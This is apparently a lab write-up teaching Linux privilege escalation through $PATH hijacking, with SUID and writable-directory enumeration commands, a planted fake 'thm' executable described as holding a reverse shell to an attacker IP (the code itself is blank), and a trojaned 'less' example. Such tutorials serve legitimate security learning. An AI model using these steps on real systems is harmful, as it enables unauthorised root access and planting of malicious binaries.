$PATH Hijacking - Linux Privilege Escalation
Note: If you need to zoom in, you can click on the image.
What is a PATH?
$PATH in Linux is essentially an environmental variable that tells the operating system where to look for binaries and executable. To print out your path variable, you can put: echo $PATH then it will move left to right finding the executable that it need to execute. Once it find the executable, then it stop and run it. So then what is PATH Hijacking?
$PATH Hijacking
Essentially what it is trying to find an command that has root privilege either from SUID or if it is a file created from root. Then creating an duplicate version of the command from a writeable folder and putting malicious code (such as spawning a reverse shell) inside of that command and putting the location of the malicious command first in the path so that it is executed first. Think of it like a evil twin brother trying to ruin your life.
Additional resource I think would help: https://www.youtube.com/watch?v=-4asq6Tldf0&t=750s&ab_channel=IppSec
First, let find if there is any binary that has SUID set. Here is a command that print out the files that have the SUID set and print out the file owner and location of the file.
find / -type f -perm -04000 -ls 2>/dev/null | awk '{print $3, $5, $6, $NF}'.
The next part is finding area that is writeable. To help our search, this command will be of use: `find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u`
What pop out is that /home/murdoch is hosting a file that has a SUID and area that is writeable. This make a perfect place to stage our attack. Next I will change my current directory to /home/murdoch. When I do ls -l, you can see that murdoch privilege allows anyone to read, write, execute.
Now, It's time to go into the directory. We have two items: test and thm.py. Here is the content of thm.py:
It look like test was created from thm.py. The reason why I said that is because when you try to run ./test -> it say thm not found. So, the next step would be creating a executable called thm with malicious code in it. The first thing I'm going do is create thm by using `touch thm`. After creating thm, I will add these following line:
|
|
Note: Replace 10.10.53.99 and 6777 with your attacker ip and port
Then I will do chmod u+x thm and add the current directory to the $PATH using this command:
export PATH=/home/murdoch:$PATHand echo $PATH to see the updated path.
Now, let's setup our listener and execute ./test. Boom! we got root privilege.
Masquerading as a Legit command
Here we have a command less. If we do which less -> It will print the directory of where the command is being executed which is /usr/bin/less. But let’s say that less had sudo root privilege or even SUID set to it and abuse that opportunity to get root privilege.
To do that we first need to find a writeable area that anyone write to. For the sake of example, I will use /home/murdoch. Then I will create file name less and give it read, write, execute (777). Then I will go inside the file and include these following code:
|
|
Since we already added /home/murdoch to our path. Whenever we type less, it will type out: “Hello you been infected”. Additionally, when we do which less -> The path got change from /usr/bin/less to /home/murdoch/less.
That is all I have to share on PATH Hijacking. Thanks for reading